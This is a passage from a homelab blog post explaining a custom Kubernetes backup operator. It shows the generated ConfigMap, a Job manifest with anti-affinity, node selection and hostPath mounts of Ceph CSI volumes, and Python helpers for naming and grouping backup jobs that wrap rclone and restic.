</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      yearly: 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    - name: testing-mysql-pv-claim
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    - name: testing-wp-pv-claim</span>
</span></span></code></pre></div><p>This config describes the retention policy and the volumes for this backup.
The retention policy is one of the shortcuts I took. It&rsquo;s actually more of a
global config, which I would normally provide to the backup Job via environment
variables. But because the retention is not just a simple single value, I
decided that it&rsquo;s just easier to add it to the config file, even though it&rsquo;s not
specific to the currently executed backup Job.</p>
<p>The entries in the <code>volumes:</code> list are the combination of the PVC&rsquo;s namespace+name.
These are also the names of the directories under which they&rsquo;re mounted into
the backup container.</p>
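<p>Putting that together, generating the ConfigMap might look roughly like the
following sketch. The function, the label on the ConfigMap and the retention
constant are illustrative; the data layout matches the example above:</p>
<pre tabindex="0"><code>import yaml
from kubernetes_asyncio import client

RETENTION = {&#34;daily&#34;: 7, &#34;weekly&#34;: 6, &#34;monthly&#34;: 6, &#34;yearly&#34;: 1}

async def create_job_configmap(core_v1, hlsb_namespace, hlsb_name, pvc_refs):
    # pvc_refs: list of (namespace, name) tuples for this host group
    conf = {
        &#34;retention&#34;: RETENTION,
        &#34;volumes&#34;: [{&#34;name&#34;: f&#34;{ns}-{name}&#34;} for ns, name in pvc_refs],
    }
    body = client.V1ConfigMap(
        metadata=client.V1ObjectMeta(
            name=f&#34;backup-confmap-{hlsb_namespace}-{hlsb_name}&#34;,
            labels={&#34;homelab/part-of&#34;: &#34;hlsb&#34;},
        ),
        data={&#34;hlsb-conf.yaml&#34;: yaml.safe_dump(conf)},
    )
    return await core_v1.create_namespaced_config_map(&#34;backups&#34;, body)
</code></pre>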
<h3 id="creating-the-job">Creating the Job</h3>
<p>As I&rsquo;ve noted above, each host where one of the app&rsquo;s volumes is mounted gets a
Job. These Jobs only have one Pod, running a relatively simple Python app that
reads the config file and runs <code>restic backup</code> on the mount directories of all
the volumes to be backed up.</p>
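<p>Submitting such a Job is again a single API call; a minimal sketch, assuming the
manifest has already been assembled as a plain dict shaped like the example below:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client

async def launch_backup_job(api, job_manifest):
    batch_v1 = client.BatchV1Api(api)
    # job_manifest is a plain dict with the structure shown below
    return await batch_v1.create_namespaced_job(&#34;backups&#34;, job_manifest)
</code></pre>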
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;batch/v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;Job&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;hlsb&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf_backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf-backup-audiobookshelf-5746d54b-3826-486d-b33f&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;backups&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;backoffLimit&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;completions&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;parallelism&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;template&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;affinity&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;podAntiAffinity&#34;</span>: {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;requiredDuringSchedulingIgnoredDuringExecution&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;labelSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;matchLabels&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                },
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;topologyKey&#34;</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ]
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;containers&#34;</span>: [
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;command&#34;</span>: [
</span></span><span style="display:flex;"><span>                            <span style="color:#e6db74">&#34;hn-backup&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span><span style="display:flex;"><span>                        ],
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;env&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_BACKUP_BUCKET&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SCRATCH_VOL_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/backup-s3-scratch&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_VOL_MOUNT_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NAME&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NS&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_CONFIG&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/hlsb-conf.yaml&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_RESTIC_PW&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;pw&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;restic-pw&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ],
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;image&#34;</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hn-backup:5.0.0&#34;</span>,
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>,
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;volumeMounts&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/audiobookshelf-abs-data-volume&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;readOnly&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ]
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                ],
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;nodeSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;kubernetes.io/hostname&#34;</span>: <span style="color:#e6db74">&#34;khepri&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;priorityClassName&#34;</span>: <span style="color:#e6db74">&#34;system-node-critical&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;restartPolicy&#34;</span>: <span style="color:#e6db74">&#34;Never&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;volumes&#34;</span>: [
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;hostPath&#34;</span>: {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/4e3bcff1fd37dd7554102fbe925eef191491c4f5fd7323a4564c4008d86ee967/globalmount/0001-000c-rook-cluster-0000000000000003-642bef40-20b8-4df0-ab2f-6190c6b78d74&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>                    },
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;configMap&#34;</span>: {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;defaultMode&#34;</span>: <span style="color:#ae81ff">420</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;backup-confmap-audiobookshelf-backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This one does not fit the HLSB I&rsquo;ve been using as an example, but I hope you can
forgive that oversight. I forgot to save the JSON for one of the jobs I ran
against my example HLSB.</p>
<p>Let&rsquo;s start with the <code>metadata</code> property:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;metadata&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;hlsb&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf_backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf-backup-audiobookshelf-5746d54b-3826-486d-b33f&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;backups&#34;</span>,
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>For identification reasons, all pieces belonging to a certain HLSB have that
HLSB&rsquo;s namespace and name in the <code>hlsb</code> label. In addition, they&rsquo;re all marked as
<code>part-of</code> the Homelab service backup, following my general labeling scheme.
The name of the Job again contains the namespace and name of the HLSB and is
capped off by a random string. It is generated like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_new_job_name</span>(hlsb_name, hlsb_namespace):
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>hlsb_namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">-</span><span style="color:#e6db74">{</span>hlsb_name<span style="color:#e6db74">}</span><span style="color:#e6db74">-</span><span style="color:#e6db74">{</span>uuid<span style="color:#f92672">.</span>uuid4()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    truncated_name <span style="color:#f92672">=</span> name[<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">61</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> truncated_name[<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;-&#34;</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> truncated_name[<span style="color:#ae81ff">0</span>:<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> truncated_name
</span></span></code></pre></div><p>Creating this name was a lot more complicated than I anticipated. Because I
don&rsquo;t currently have any integration tests against a real k8s cluster, this
function was a surprising source of issues. To begin with, the name of a Job
can only be 63 chars long at maximum. So appending the full UUID led to errors
during the initial testing. Then I thought I had it, with my test HLSB running
backups successfully. And then I implemented the above HLSB, for my
<a href="https://www.audiobookshelf.org/">Audiobookshelf</a> deployment. And I then found
that the cutoff at 61 chars I implemented left the name ending in a <code>-</code>. Which
k8s also doesn&rsquo;t allow, hence the check whether the name ends in <code>-</code>. &#x1f926;</p>
<p>Another thing worth mentioning: The backup jobs run in my <code>backups</code> namespace,
not in the app&rsquo;s namespace. This is mostly so that I can comfortably keep all of
the necessary secrets in a separate namespace.</p>
<p>Then let&rsquo;s continue with the spec, more precisely the affinity I&rsquo;ve set up:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;affinity&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;podAntiAffinity&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;requiredDuringSchedulingIgnoredDuringExecution&#34;</span>: [
</span></span><span style="display:flex;"><span>            {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;labelSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;matchLabels&#34;</span>: {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;topologyKey&#34;</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>This config prevents multiple backup Jobs from running on the same host. This is
necessary because sometimes, especially with larger S3 buckets to be backed up,
the rclone invocation in the backup container can use quite a lot of resources.
Plus, I just generally didn&rsquo;t want to tax any specific node too much.</p>
<p>Next, the node selector, which ensures that the Job runs on the host where
the required volumes are mounted:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;nodeSelector&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kubernetes.io/hostname&#34;</span>: <span style="color:#e6db74">&#34;khepri&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>This value is computed from the information gathered by the PVC probing
I&rsquo;ve described above. The volumes to be backed up get grouped by the hosts
they&rsquo;re mounted on, and then every resulting group/host gets one Job.</p>
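<p>The grouping itself is simple enough; a small sketch, with the tuple layout
being illustrative:</p>
<pre tabindex="0"><code>from collections import defaultdict

def group_by_host(resolved_volumes):
    # resolved_volumes: (node_name, pvc_ref, host_path) tuples from the probing above
    groups = defaultdict(list)
    for node_name, pvc_ref, host_path in resolved_volumes:
        groups[node_name].append((pvc_ref, host_path))
    return groups
</code></pre>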
<p>And then the more interesting part, the volumes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;volumes&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;hostPath&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/4e3bcff1fd37dd7554102fbe925eef191491c4f5fd7323a4564c4008d86ee967/globalmount/0001-000c-rook-cluster-0000000000000003-642bef40-20b8-4df0-ab2f-6190c6b78d74&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;configMap&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;defaultMode&#34;</span>: <span style="color:#ae81ff">420</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;backup-confmap-audiobookshelf-backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>The <code>hostPath.path</code> is computed as described above, via the information from the
persistent volume. And the name for the volume is defined as <code>vol-backup-pvc_namespace-pvc_name</code>.
Additionally, the ConfigMap described in the previous section also gets
mounted.</p>
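<p>Assembling those two entries for a single PVC might look roughly like this,
reusing the <code>get_ceph_csi_host_path</code> function from above; everything else is
illustrative:</p>
<pre tabindex="0"><code>def build_volume_entries(pv, pvc_namespace, pvc_name):
    vol_name = f&#34;vol-backup-{pvc_namespace}-{pvc_name}&#34;
    volume = {
        &#34;name&#34;: vol_name,
        &#34;hostPath&#34;: {&#34;path&#34;: get_ceph_csi_host_path(pv), &#34;type&#34;: &#34;&#34;},
    }
    mount = {
        &#34;name&#34;: vol_name,
        &#34;mountPath&#34;: f&#34;/hlsb-mounts/{pvc_namespace}-{pvc_name}&#34;,
    }
    return volume, mount
</code></pre>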
<p>And finally, the container itself. Let&rsquo;s start with the command and image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;command&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;hn-backup&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span><span style="display:flex;"><span>]<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;image&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hn-backup:5.0.0&#34;</span><span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>I&rsquo;ve kept it pretty simple. And instead of mucking around with lots of command
line switches, the configuration is done via the config file and environment
variables.
I won&rsquo;t say much about the <code>hn-backup</code> program, as it&rsquo;s mainly just a wrapper
around <a href="https://rclone.org/">rclone</a> for fetching S3 buckets to be backed up
and <a href="https://restic.net/">restic</a> for the backups themselves.</p>
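<p>To give a rough idea of what that means, here&rsquo;s a heavily simplified sketch of the
rclone + restic flow. This is not the real hn-backup code; the &ldquo;svc-s3&rdquo; remote is a
hypothetical, pre-configured rclone remote, and restic is assumed to get its password
and S3 credentials from environment variables:</p>
<pre tabindex="0"><code>import os
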